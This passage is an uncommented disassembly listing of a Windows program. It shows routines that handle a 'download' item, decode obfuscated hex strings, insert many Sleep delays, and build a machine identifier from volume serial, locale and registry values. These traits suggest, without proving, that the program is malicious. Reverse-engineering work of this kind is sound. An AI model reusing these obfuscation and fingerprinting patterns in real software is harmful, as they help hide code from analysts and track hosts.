loc_424382: ; CODE XREF: sub_424343+18�j
; sub_424343+1C�j
mov [esi], edi
loc_424384: ; CODE XREF: sub_424343+31�j
; sub_424343+3D�j
mov eax, esi
pop edi
pop esi
retn 8
sub_424343 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42438B proc near ; CODE XREF: sub_42342D+57�p
; sub_42342D+454�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
mov esi, ecx
lea ecx, [ebp+var_4]
mov eax, [esi]
push ecx
push esi
call dword ptr [eax+34h]
test eax, eax
jge short loc_4243B0
push offset dword_437218
push esi
push eax
call sub_431960
loc_4243B0: ; CODE XREF: sub_42438B+17�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
pop esi
mov [eax], ecx
leave
retn 4
sub_42438B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4243BD proc near ; CODE XREF: sub_42342D+BBF�p
; sub_42342D+C43�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
mov esi, ecx
lea ecx, [ebp+var_4]
mov eax, [esi]
push ecx
push esi
call dword ptr [eax+40h]
test eax, eax
jge short loc_4243E2
push offset dword_437218
push esi
push eax
call sub_431960
loc_4243E2: ; CODE XREF: sub_4243BD+17�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
pop esi
mov [eax], ecx
leave
retn 4
sub_4243BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4243EF proc near ; CODE XREF: sub_42342D+104�p
; sub_42342D+225�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
mov esi, ecx
lea ecx, [ebp+var_4]
mov eax, [esi]
push ecx
push esi
call dword ptr [eax+68h]
test eax, eax
jge short loc_424414
push offset dword_437218
push esi
push eax
call sub_431960
loc_424414: ; CODE XREF: sub_4243EF+17�j
mov ecx, [ebp+arg_0]
push 0
push [ebp+var_4]
call sub_4242EC
mov eax, [ebp+arg_0]
pop esi
leave
retn 4
sub_4243EF endp
; =============== S U B R O U T I N E =======================================
sub_424429 proc near ; CODE XREF: sub_42852F+947�p
mov eax, offset loc_431F90
call sub_43176A ; _EH_prolog
sub esp, 1Ch
push ebx
push esi
push edi
xor ebx, ebx
mov [ebp-4], ebx
mov [ebp-18h], ebx
mov [ebp-10h], ebx
mov esi, [ebp+8]
mov byte ptr [ebp-4], 1
cmp esi, ebx
mov edi, 80004003h
jnz short loc_42445A
push edi
call sub_431952
loc_42445A: ; CODE XREF: sub_424429+29�j
lea eax, [ebp-14h]
mov ecx, esi
push eax
call sub_42438B
push dword ptr [eax]
lea ecx, [ebp-10h]
call sub_4264AF
lea ecx, [ebp-14h]
call sub_4264A2
loc_424477: ; CODE XREF: sub_424429+149�j
push ebx
lea ecx, [ebp-10h]
call sub_4264DA
test al, al
jnz loc_424577
push offset aDownload ; "download"
lea ecx, [ebp-20h]
call sub_4240F6
mov esi, eax
cmp [ebp-10h], ebx
mov byte ptr [ebp-4], 2
jnz short loc_4244A6
push edi
call sub_431952
loc_4244A6: ; CODE XREF: sub_424429+75�j
mov ecx, [ebp-10h]
lea eax, [ebp-1Ch]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-1Ch]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-20h]
mov byte ptr [ebp-4], 1
call sub_42414A
test bl, bl
jz short loc_424543
xor esi, esi
cmp [ebp-10h], esi
jnz short loc_4244E7
push edi
call sub_431952
loc_4244E7: ; CODE XREF: sub_424429+B6�j
mov ecx, [ebp-10h]
lea eax, [ebp-14h]
push eax
call sub_42438B
mov byte ptr [ebp-4], 3
loc_4244F7: ; CODE XREF: sub_424429+107�j
push esi
lea ecx, [ebp-14h]
call sub_4264DA
test al, al
jnz short loc_424532
inc dword ptr [ebp-18h]
cmp [ebp-14h], esi
jnz short loc_424512
push edi
call sub_431952
loc_424512: ; CODE XREF: sub_424429+E1�j
mov ecx, [ebp-14h]
lea eax, [ebp-24h]
push eax
call sub_4243BD
push dword ptr [eax]
lea ecx, [ebp-14h]
call sub_4264AF
lea ecx, [ebp-24h]
call sub_4264A2
jmp short loc_4244F7
; ---------------------------------------------------------------------------
loc_424532: ; CODE XREF: sub_424429+D9�j
mov eax, [ebp-14h]
mov byte ptr [ebp-4], 1
cmp eax, esi
jz short loc_424543
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_424543: ; CODE XREF: sub_424429+AF�j
; sub_424429+112�j
cmp dword ptr [ebp-10h], 0
jnz short loc_42454F
push edi
call sub_431952
loc_42454F: ; CODE XREF: sub_424429+11E�j
mov ecx, [ebp-10h]
lea eax, [ebp-28h]
push eax
call sub_4243BD
push dword ptr [eax]
lea ecx, [ebp-10h]
call sub_4264AF
lea ecx, [ebp-28h]
call sub_4264A2
mov esi, [ebp+8]
xor ebx, ebx
jmp loc_424477
; ---------------------------------------------------------------------------
loc_424577: ; CODE XREF: sub_424429+59�j
mov eax, [ebp-10h]
and byte ptr [ebp-4], 0
cmp eax, ebx
jz short loc_424588
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_424588: ; CODE XREF: sub_424429+157�j
or dword ptr [ebp-4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_424596
mov eax, [esi]
push esi
call dword ptr [eax+8]
loc_424596: ; CODE XREF: sub_424429+165�j
mov ecx, [ebp-0Ch]
mov eax, [ebp-18h]
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_424429 endp
; =============== S U B R O U T I N E =======================================
sub_4245AA proc near ; CODE XREF: sub_42852F+A47�p
mov eax, offset loc_43200F
call sub_43176A ; _EH_prolog
mov eax, 208Ch
call sub_431700
push ebx
mov ebx, ecx
mov ecx, [ebp+0Ch]
push esi
test ecx, ecx
push edi
jle loc_4249BF
mov eax, [ebp+8]
mov dword ptr [ebp-1Ch], 0FFFFE000h
sub [ebp-1Ch], eax
mov [ebp-28h], ecx
lea esi, [eax+2000h]
loc_4245E4: ; CODE XREF: sub_4245AA+40F�j
cmp byte ptr [esi+12000h], 0
jz loc_4246D8
push esi
call sub_43175E ; strlen
test eax, eax
pop ecx
jbe loc_4246D8
cmp byte ptr [esi], 23h
jnz loc_4246D8
lea eax, [ebp-2098h]
push esi
push eax
call sub_431758 ; strcpy
mov edi, offset dword_437240
lea eax, [ebp-2098h]
push edi
push eax
call dword_4331CC ; strstr
add esp, 10h
test eax, eax
jz short loc_424666
lea ecx, [ebp-2098h]
sub eax, ecx
inc eax
cmp eax, 1
mov [ebp+0Ch], eax
jle short loc_424666
push eax
lea eax, [ebp-2098h]
push eax
push esi
call dword_43319C ; strncpy
mov eax, [ebp-1Ch]
mov ecx, [ebp+8]
add eax, esi
add esp, 0Ch
add eax, [ebp+0Ch]
and byte ptr [eax+ecx+2000h], 0
loc_424666: ; CODE XREF: sub_4245AA+84�j
; sub_4245AA+95�j
push edi
push esi
call sub_431770 ; strcat
push dword ptr [ebx+20h]
push esi
call sub_431770 ; strcat
add esp, 10h
lea ecx, [ebp-14h]
call sub_43164E
and dword ptr [ebp-4], 0
push esi
lea ecx, [ebp-14h]
call sub_43163C
push ecx
lea eax, [ebp-14h]
mov ecx, esp
mov [ebp+0Ch], esp
push eax
call sub_431636
lea eax, [ebp-38h]
mov ecx, ebx
push eax
call sub_422F54
push eax
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 1
call sub_431648
and byte ptr [ebp-4], 0
lea ecx, [ebp-38h]
call sub_431642
push dword ptr [ebp-14h]
push esi
call sub_431758 ; strcpy
or dword ptr [ebp-4], 0FFFFFFFFh
pop ecx
pop ecx
lea ecx, [ebp-14h]
call sub_431642
loc_4246D8: ; CODE XREF: sub_4245AA+41�j
; sub_4245AA+50�j ...
lea ecx, [ebp-10h]
call sub_43164E
lea ecx, [ebp-24h]
mov dword ptr [ebp-4], 2
call sub_43164E
cmp byte ptr [esi+12000h], 0
mov byte ptr [ebp-4], 3
jz loc_4247CA
lea edi, [ebx+20h]
lea ecx, [ebp-24h]
push edi
call sub_431648
push offset dword_437238
lea eax, [ebp-2Ch]
push edi
push eax
call sub_43165A
push eax
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 4
call sub_431648
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 3
call sub_431642
push dword ptr [ebp-10h]
call sub_4221DB
test eax, eax
pop ecx
jz short loc_42474D
push 1
push dword ptr [ebp-10h]
call sub_421C92
pop ecx
pop ecx
loc_42474D: ; CODE XREF: sub_4245AA+195�j
push dword ptr [edi]
call sub_4221DB
test eax, eax
pop ecx
jz short loc_424769
mov edi, [edi]
push 1
push dword ptr [ebp-10h]
push edi
call sub_421D8A
add esp, 0Ch
loc_424769: ; CODE XREF: sub_4245AA+1AD�j
push 80000000h
push 1
push ecx
mov ecx, esp
mov [ebp+0Ch], esp
push offset byte_439CA0
call sub_43162A
push ecx
mov byte ptr [ebp-4], 5
mov ecx, esp
mov [ebp-20h], esp
push offset dword_43722C
call sub_43162A
lea ecx, [ebp-58h]
mov byte ptr [ebp-4], 3
call sub_42692B
push ecx
lea eax, [esi+0E000h]
mov ecx, esp
mov [ebp+0Ch], esp
push eax
mov byte ptr [ebp-4], 6
call sub_43162A
lea ecx, [ebp-58h]
call sub_426DB8
lea ecx, [ebp-58h]
mov byte ptr [ebp-4], 3
call sub_426ABF
loc_4247CA: ; CODE XREF: sub_4245AA+150�j
push 2Eh
call dword_4330E0 ; Sleep
mov al, [esi+12000h]
mov ecx, ebx
push eax
mov al, [esi+12004h]
push dword ptr [esi+12008h]
push eax
mov al, [esi+12001h]
push eax
mov al, [esi+12002h]
push eax
lea eax, [esi+2000h]
push eax
lea eax, [esi+4000h]
push eax
lea eax, [esi-2000h]
push esi
push eax
call sub_422E6E
lea ecx, [ebp-18h]
mov [ebp+0Fh], al
call sub_43164E
lea eax, [esi+10000h]
lea ecx, [ebp-18h]
push eax
mov byte ptr [ebp-4], 7
call sub_43163C
lea eax, [ebp-18h]
push offset dword_437228
push eax
lea eax, [ebp-30h]
push eax
call sub_43165A
lea edi, [esi+0E000h]
mov byte ptr [ebp-4], 8
push edi
push eax
lea eax, [ebp-34h]
push eax
call sub_43165A
push eax
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 9
call sub_431648
lea ecx, [ebp-34h]
mov byte ptr [ebp-4], 8
call sub_431642
lea ecx, [ebp-30h]
mov byte ptr [ebp-4], 7
call sub_431642
push ecx
lea eax, [ebp-18h]
mov ecx, esp
mov [ebp-20h], esp
push eax
call sub_431636
mov ecx, ebx
call sub_425952
mov al, [esi+12000h]
test al, al
jz loc_42498C
cmp byte ptr [ebp+0Fh], 0
jz short loc_42490A
push 80000000h
push 1
push ecx
mov byte ptr [ebx+18h], 1
mov ecx, esp
mov [ebp+0Ch], esp
push offset byte_439CA0
call sub_43162A
push ecx
mov byte ptr [ebp-4], 0Ah
mov ecx, esp
mov [ebp-20h], esp
push offset dword_43722C
call sub_43162A
lea ecx, [ebp-98h]
mov byte ptr [ebp-4], 7
call sub_42692B
push ecx
mov byte ptr [ebp-4], 0Bh
mov ecx, esp
mov [ebp+0Ch], esp
push edi
call sub_43162A
lea ecx, [ebp-98h]
call sub_426DB8
mov byte ptr [ebp-4], 7
lea ecx, [ebp-98h]
jmp short loc_424987
; ---------------------------------------------------------------------------
loc_42490A: ; CODE XREF: sub_4245AA+2F9�j
test al, al
jz short loc_42498C
cmp byte ptr [ebp+0Fh], 0
jnz short loc_42498C
push dword ptr [ebp-10h]
call sub_4221DB
test eax, eax
pop ecx
jz short loc_424931
push 1
push dword ptr [ebp-24h]
push dword ptr [ebp-10h]
call sub_421D8A
add esp, 0Ch
loc_424931: ; CODE XREF: sub_4245AA+375�j
push 80000000h
push 1
push ecx
mov ecx, esp
mov [ebp+0Ch], esp
push offset byte_439CA0
call sub_43162A
push ecx
mov byte ptr [ebp-4], 0Ch
mov ecx, esp
mov [ebp-20h], esp
push offset dword_43722C
call sub_43162A
lea ecx, [ebp-78h]
mov byte ptr [ebp-4], 7
call sub_42692B
push ecx
mov byte ptr [ebp-4], 0Dh
mov ecx, esp
mov [ebp+0Ch], esp
push ebx
call sub_431636
lea ecx, [ebp-78h]
call sub_426DB8
mov byte ptr [ebp-4], 7
lea ecx, [ebp-78h]
loc_424987: ; CODE XREF: sub_4245AA+35E�j
call sub_426ABF
loc_42498C: ; CODE XREF: sub_4245AA+2EF�j
; sub_4245AA+362�j ...
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 3
call sub_431642
lea ecx, [ebp-24h]
mov byte ptr [ebp-4], 2
call sub_431642
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp-10h]
call sub_431642
add esi, 1400Ch
dec dword ptr [ebp-28h]
jnz loc_4245E4
loc_4249BF: ; CODE XREF: sub_4245AA+1E�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov al, 1
mov large fs:0, ecx
pop ebx
leave
retn 8
sub_4245AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4249D2 proc near ; CODE XREF: sub_422C48+109�p
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
push edi
push [ebp+arg_4]
call sub_422199
pop ecx
push [ebp+arg_4]
call dword_433048 ; SetCurrentDirectoryA
xor esi, esi
push 2
push esi
push [ebp+arg_0]
call sub_43110B
mov edi, eax
lea eax, [ebp+var_12C]
push eax
push 0FFFFFFFFh
push edi
call sub_4311D8
mov ebx, [ebp+var_12C]
add esp, 18h
test ebx, ebx
jle short loc_424A43
loc_424A1B: ; CODE XREF: sub_4249D2+6F�j
lea eax, [ebp+var_12C]
push eax
push esi
push edi
call sub_4311D8
push 2
lea eax, [ebp+var_128]
push 0
push eax
push esi
push edi
call sub_4314C0
add esp, 20h
inc esi
cmp esi, ebx
jl short loc_424A1B
loc_424A43: ; CODE XREF: sub_4249D2+47�j
push edi
call sub_43152B
pop ecx
pop edi
pop esi
mov al, 1
pop ebx
leave
retn 8
sub_4249D2 endp
; =============== S U B R O U T I N E =======================================
sub_424A53 proc near ; CODE XREF: sub_422C48+DA�p
mov eax, offset loc_43202E
call sub_43176A ; _EH_prolog
push ecx
push ecx
push ebx
push esi
xor ebx, ebx
push 8
mov [ebp-4], ebx
call sub_431624
pop ecx
mov ecx, eax
mov [ebp-14h], ecx
cmp ecx, ebx
mov byte ptr [ebp-4], 1
jz short loc_424A84
call sub_421000
mov esi, eax
jmp short loc_424A86
; ---------------------------------------------------------------------------
loc_424A84: ; CODE XREF: sub_424A53+26�j
xor esi, esi
loc_424A86: ; CODE XREF: sub_424A53+2F�j
mov ecx, esi
mov [ebp-4], bl
call sub_42103D
lea eax, [ebp-10h]
mov ecx, esi
push eax
push dword ptr [ebp+8]
call sub_42146A
mov ecx, esi
call sub_4210DD
cmp esi, ebx
jz short loc_424AB1
mov eax, [esi]
push 1
mov ecx, esi
call dword ptr [eax]
loc_424AB1: ; CODE XREF: sub_424A53+54�j
mov eax, [ebp+0Ch]
cmp eax, [ebp-10h]
jnz short loc_424ABB
mov bl, 1
loc_424ABB: ; CODE XREF: sub_424A53+64�j
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call sub_431642
mov ecx, [ebp-0Ch]
mov al, bl
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 8
sub_424A53 endp
; =============== S U B R O U T I N E =======================================
sub_424AD9 proc near ; CODE XREF: sub_422C48+88�p
; sub_42334C+1A�p ...
arg_0 = byte ptr 4
lea ecx, [esp+arg_0]
call sub_431642
retn 4
sub_424AD9 endp
; =============== S U B R O U T I N E =======================================
sub_424AE5 proc near ; CODE XREF: sub_422A1E+E9�p
mov eax, offset loc_432099
call sub_43176A ; _EH_prolog
sub esp, 3C8h
push ebx
push esi
mov [ebp-20h], ecx
xor esi, esi
push edi
lea ecx, [ebp-34h]
mov [ebp-40h], esi
call sub_43164E
lea ecx, [ebp-30h]
mov [ebp-4], esi
call sub_43164E
mov dx, ds:word_439CA4
xor eax, eax
lea edi, [ebp-5Ah]
mov [ebp-5Ch], dx
stosd
stosd
stosd
stosd
stosw
xor eax, eax
lea edi, [ebp-66h]
mov [ebp-68h], dx
push 40h
stosd
stosd
pop ecx
xor eax, eax
lea edi, [ebp-3D2h]
mov [ebp-3D4h], dx
rep stosd
stosw
xor eax, eax
lea edi, [ebp-46h]
mov [ebp-48h], dx
push 40h
stosw
pop ecx
lea edi, [ebp-1CAh]
mov [ebp-1CCh], dx
mov [ebp-18h], dx
rep stosd
stosw
xor eax, eax
lea edi, [ebp-16h]
stosb
lea edi, [ebp-1Ah]
mov [ebp-1Ch], dx
stosb
lea edi, [ebp-12h]
mov [ebp-14h], dx
lea ecx, [ebp-44h]
mov byte ptr [ebp-4], 1
stosb
mov [ebp-2Ch], esi
mov byte ptr [ebp-21h], 1
call sub_43164E
mov esi, dword_4330E0
push 22h
mov byte ptr [ebp-4], 2
call esi ; Sleep
mov edi, dword_4330CC
lea eax, [ebp-2D0h]
push offset a67f9158b ; "67F9158B"
push eax
call edi ; lstrcpyA
push 2
call esi ; Sleep
lea eax, [ebp-2D0h]
push eax
call dword_4330B4 ; lstrlenA
mov ecx, [ebp-20h]
push eax
lea eax, [ebp-2D0h]
push eax
lea eax, [ebp-10h]
push eax
call sub_42309C
push dword ptr [eax]
lea eax, [ebp-3Ch]
push eax
call edi ; lstrcpyA
lea ecx, [ebp-10h]
call sub_431642
lea eax, [ebp-2D0h]
push offset a39 ; "39"
push eax
call edi ; lstrcpyA
push 1
call esi ; Sleep
cmp byte ptr [ebp+0Ch], 0
mov ebx, dword_433078
jz short loc_424C3F
lea eax, [ebp-2D0h]
push eax
call dword_4330B4 ; lstrlenA
mov ecx, [ebp-20h]
push eax
lea eax, [ebp-2D0h]
push eax
lea eax, [ebp-10h]
push eax
call sub_42309C
push dword ptr [eax]
lea eax, [ebp-1CCh]
push eax
call ebx ; lstrcatA
lea ecx, [ebp-10h]
call sub_431642
loc_424C3F: ; CODE XREF: sub_424AE5+124�j
lea eax, [ebp-3D4h]
push 104h
push eax
call dword_4330D4 ; GetWindowsDirectoryA
xor eax, eax
mov [ebp-10h], eax
jmp short loc_424C5B
; ---------------------------------------------------------------------------
loc_424C58: ; CODE XREF: sub_424AE5+18B�j
mov eax, [ebp-10h]
loc_424C5B: ; CODE XREF: sub_424AE5+171�j
mov cl, [ebp+eax-3D4h]
push eax
mov [ebp+eax-48h], cl
call esi ; Sleep
inc dword ptr [ebp-10h]
cmp dword ptr [ebp-10h], 3
jl short loc_424C58
xor eax, eax
lea ecx, [ebp-40h]
push eax
push eax
push eax
push eax
push ecx
push eax
push eax
lea eax, [ebp-48h]
push eax
call dword_4330B8 ; GetVolumeInformationA
mov ecx, [ebp-20h]
lea eax, [ebp-5Ch]
push 10h
push eax
push dword ptr [ebp-40h]
call sub_42521F
lea eax, [ebp-2D0h]
push offset a67f9198b ; "67F9198B"
push eax
call edi ; lstrcpyA
push 2
call esi ; Sleep
lea eax, [ebp-2D0h]
push eax
call dword_4330B4 ; lstrlenA
mov ecx, [ebp-20h]
push eax
lea eax, [ebp-2D0h]
push eax
lea eax, [ebp-10h]
push eax
call sub_42309C
push dword ptr [eax]
lea eax, [ebp-3Ch]
push eax
call edi ; lstrcpyA
lea ecx, [ebp-10h]
call sub_431642
push dword ptr [ebp-40h]
lea eax, [ebp-3Ch]
push eax
lea eax, [ebp-5Ch]
push eax
call dword_433298 ; wsprintfA
add esp, 0Ch
lea eax, [ebp-5Ch]
push eax
call dword_43329C ; CharUpperA
lea eax, [ebp-5Ch]
push eax
lea eax, [ebp-1CCh]
push eax
call ebx ; lstrcatA
lea eax, [ebp-2D0h]
push offset a0a887397a5f240 ; "0A887397A5F240675EEF4D35019B6883A6FA5D6"...
push eax
call edi ; lstrcpyA
push 22h
call esi ; Sleep
push 80000002h
push 1
lea eax, [ebp-2D0h]
push 0
push eax
call dword_4330B4 ; lstrlenA
push ecx
mov ecx, esp
mov [ebp-28h], esp
push eax
lea eax, [ebp-2D0h]
push eax
push ecx
mov ecx, [ebp-20h]
call sub_42309C
lea ecx, [ebp-0C8h]
call sub_426584
mov byte ptr [ebp-4], 3
lea ecx, [ebp-0C8h]
call sub_426816
mov [ebp-28h], eax
lea eax, [ebp-2D0h]
push offset a67f9158b ; "67F9158B"
push eax
call edi ; lstrcpyA
lea eax, [ebp-2D0h]
push eax
call dword_4330B4 ; lstrlenA
mov ecx, [ebp-20h]
push eax
lea eax, [ebp-2D0h]
push eax
lea eax, [ebp-10h]
push eax
call sub_42309C
push dword ptr [eax]
lea eax, [ebp-3Ch]
push eax
call edi ; lstrcpyA
lea ecx, [ebp-10h]
call sub_431642
push dword ptr [ebp-28h]
lea eax, [ebp-3Ch]
push eax
lea eax, [ebp-5Ch]
push eax
call dword_433298 ; wsprintfA
add esp, 0Ch
lea eax, [ebp-1CCh]
push offset asc_437320 ; "-"
push eax
call ebx ; lstrcatA
push 24h
call esi ; Sleep
lea eax, [ebp-5Ch]
push eax
lea eax, [ebp-1CCh]
push eax
call ebx ; lstrcatA
call dword_4330BC ; GetSystemDefaultLCID
push eax
lea eax, [ebp-3Ch]
push eax
lea eax, [ebp-5Ch]
push eax
call dword_433298 ; wsprintfA
add esp, 0Ch
lea eax, [ebp-1CCh]
push offset asc_437320 ; "-"
push eax
call ebx ; lstrcatA
push 2
call esi ; Sleep
lea eax, [ebp-5Ch]
push eax
lea eax, [ebp-1CCh]
push eax
call ebx ; lstrcatA
lea eax, [ebp-2D0h]
push offset a0a887397a5f2_0 ; "0A887397A5F240675EEF4D35019B6883A6FA5D6"...
push eax
call edi ; lstrcpyA
push 1
call esi ; Sleep
lea eax, [ebp-2D0h]
push eax
call dword_4330B4 ; lstrlenA
mov ecx, [ebp-20h]
push eax
lea eax, [ebp-2D0h]
push eax
lea eax, [ebp-28h]
push eax
call sub_42309C
push eax
lea ecx, [ebp-44h]
mov byte ptr [ebp-4], 4
call sub_431648
mov byte ptr [ebp-4], 3
lea ecx, [ebp-28h]
call sub_431642
push 1
call esi ; Sleep
push 80000002h
push 1
push ecx
mov ecx, esp
mov [ebp-28h], esp
push offset byte_439CA0
call sub_43162A
push ecx
lea eax, [ebp-44h]
mov ecx, esp
mov [ebp-10h], esp
push eax
mov byte ptr [ebp-4], 5
call sub_431636
lea ecx, [ebp-0A8h]
mov byte ptr [ebp-4], 3
call sub_42692B
lea eax, [ebp-10h]
lea ecx, [ebp-0A8h]
push eax
mov byte ptr [ebp-4], 6
call sub_426D5C
lea eax, [ebp-10h]
lea ecx, [ebp-30h]
push eax
mov byte ptr [ebp-4], 7
call sub_431648
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 6
call sub_431642
mov eax, [ebp-30h]
mov eax, [eax-8]
test eax, eax
jg short loc_424F05
mov eax, [ebp-2Ch]
mov ecx, [ebp-20h]
push offset a000_0 ; "-000"
and byte ptr [eax], 0
lea eax, [ebp-1CCh]
push eax
call sub_426491
push 1
call esi ; Sleep
mov ecx, [ebp-20h]
lea eax, [ebp-1CCh]
push offset a000 ; "0-00"
push eax
call sub_426491
jmp loc_424F8D
; ---------------------------------------------------------------------------
loc_424F05: ; CODE XREF: sub_424AE5+3E7�j
push eax
lea ecx, [ebp-30h]
call sub_431672
mov cl, [eax]
mov [ebp-2Ch], eax
mov [ebp-18h], cl
mov cl, [eax+1]
and byte ptr [ebp-16h], 0
mov [ebp-17h], cl
mov cl, [eax+3]
push offset asc_437320 ; "-"
mov [ebp-1Ch], cl
mov cl, [eax+4]
and byte ptr [ebp-1Ah], 0
mov [ebp-1Bh], cl
mov cl, [eax+6]
mov [ebp-14h], cl
mov al, [eax+7]
and byte ptr [ebp-12h], 0
mov [ebp-13h], al
lea eax, [ebp-1CCh]
push eax
call ebx ; lstrcatA
lea eax, [ebp-18h]
push eax
lea eax, [ebp-1CCh]
push eax
call ebx ; lstrcatA
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-1CCh]
push eax
call ebx ; lstrcatA
lea eax, [ebp-1CCh]
push offset asc_437320 ; "-"
push eax
call ebx ; lstrcatA
lea eax, [ebp-14h]
push eax
lea eax, [ebp-1CCh]
push eax
call ebx ; lstrcatA
push 0FFFFFFFFh
lea ecx, [ebp-30h]
call sub_43166C
loc_424F8D: ; CODE XREF: sub_424AE5+41B�j
lea eax, [ebp-2D0h]
push offset a0a887397a5f2_1 ; "0A887397A5F240675EEF4D35019B6883A6FA5D6"...
push eax
call edi ; lstrcpyA
push 23h
call esi ; Sleep
push 80000002h
push 1
push ecx
mov ecx, esp
mov [ebp-28h], esp
push offset byte_439CA0
call sub_43162A
lea eax, [ebp-2D0h]
mov byte ptr [ebp-4], 8
push eax
call dword_4330B4 ; lstrlenA
push ecx
mov ecx, esp
mov [ebp-10h], esp
push eax
lea eax, [ebp-2D0h]
push eax
push ecx
mov ecx, [ebp-20h]
call sub_42309C
lea ecx, [ebp-88h]
mov byte ptr [ebp-4], 6
call sub_42692B
lea eax, [ebp-10h]
lea ecx, [ebp-88h]
push eax
mov byte ptr [ebp-4], 9
call sub_426D5C
lea eax, [ebp-10h]
lea ecx, [ebp-34h]
push eax
mov byte ptr [ebp-4], 0Ah
call sub_431648
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 9
call sub_431642
mov eax, [ebp-34h]
mov eax, [eax-8]
test eax, eax
mov [ebp-28h], eax
jle loc_4250B7
push 1
call esi ; Sleep
push dword ptr [ebp-28h]
lea ecx, [ebp-34h]
call sub_431672
mov [ebp-2Ch], eax
mov al, [eax]
push 1
mov [ebp-18h], al
call esi ; Sleep
mov eax, [ebp-2Ch]
push 1
mov cl, [eax+1]
and byte ptr [ebp-16h], 0
mov [ebp-17h], cl
mov cl, [eax+3]
mov [ebp-1Ch], cl
mov cl, [eax+4]
and byte ptr [ebp-1Ah], 0
mov [ebp-1Bh], cl
mov al, [eax+6]
mov [ebp-14h], al
call esi ; Sleep
mov eax, [ebp-2Ch]
push 1
mov al, [eax+7]
and byte ptr [ebp-12h], 0
mov [ebp-13h], al
call esi ; Sleep
lea eax, [ebp-18h]
push eax
lea eax, [ebp-1CCh]
push eax
call ebx ; lstrcatA
push 1
call esi ; Sleep
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-1CCh]
push eax
call ebx ; lstrcatA
lea eax, [ebp-14h]
push eax
lea eax, [ebp-1CCh]
push eax
call ebx ; lstrcatA
push 0FFFFFFFFh
lea ecx, [ebp-34h]
call sub_43166C
jmp short loc_4250E2
; ---------------------------------------------------------------------------
loc_4250B7: ; CODE XREF: sub_424AE5+542�j
push 0
push dword ptr [ebp-2Ch]
call edi ; lstrcpyA
push 1
call esi ; Sleep
lea eax, [ebp-1CCh]
push offset a000_1 ; "000"
push eax
call ebx ; lstrcatA
push 1
call esi ; Sleep
lea eax, [ebp-1CCh]
push offset a001 ; "001"
push eax
call ebx ; lstrcatA
loc_4250E2: ; CODE XREF: sub_424AE5+5D0�j
lea eax, [ebp-68h]
push 104h
push eax
push 5
push 400h
call dword_4330C0 ; GetLocaleInfoA
push 27h
call esi ; Sleep
mov ecx, [ebp-20h]
lea eax, [ebp-68h]
push eax
call sub_4251CE
push eax
lea eax, [ebp-3Ch]
push eax
lea eax, [ebp-5Ch]
push eax
call dword_433298 ; wsprintfA
add esp, 0Ch
push 1
call esi ; Sleep
lea eax, [ebp-5Ch]
push eax
lea eax, [ebp-1CCh]
push eax
call ebx ; lstrcatA
cmp byte ptr [ebp+0Ch], 0
jz short loc_42513F
lea eax, [ebp-1CCh]
push offset asc_437258 ; "}"
push eax
call ebx ; lstrcatA
loc_42513F: ; CODE XREF: sub_424AE5+64A�j
lea eax, [ebp-1CCh]
push eax
push dword ptr [ebp+8]
call edi ; lstrcpyA
push dword ptr [ebp+8]
call dword_4330B4 ; lstrlenA
movzx ecx, byte ptr [ebp+0Ch]
shl ecx, 1
sub eax, ecx
cmp eax, 24h
jz short loc_425165
and byte ptr [ebp-21h], 0
loc_425165: ; CODE XREF: sub_424AE5+67A�j
push 26h
call esi ; Sleep
lea ecx, [ebp-88h]
mov byte ptr [ebp-4], 6
call sub_426ABF
lea ecx, [ebp-0A8h]
mov byte ptr [ebp-4], 3
call sub_426ABF
lea ecx, [ebp-0C8h]
mov byte ptr [ebp-4], 2
call sub_4266D6
lea ecx, [ebp-44h]
mov byte ptr [ebp-4], 1
call sub_431642
and byte ptr [ebp-4], 0
lea ecx, [ebp-30h]
call sub_431642
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp-34h]
call sub_431642
mov ecx, [ebp-0Ch]
mov al, [ebp-21h]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 8
sub_424AE5 endp
; =============== S U B R O U T I N E =======================================
sub_4251CE proc near ; CODE XREF: sub_424AE5+61E�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
xor dl, dl
loc_4251D7: ; CODE XREF: sub_4251CE+F�j
cmp byte ptr [eax], 20h
jnz short loc_4251DF
inc eax
jmp short loc_4251D7
; ---------------------------------------------------------------------------
loc_4251DF: ; CODE XREF: sub_4251CE+C�j
mov cl, [eax]
cmp cl, 2Bh
jz short loc_4251ED
cmp cl, 2Dh
jnz short loc_4251EE
mov dl, 1
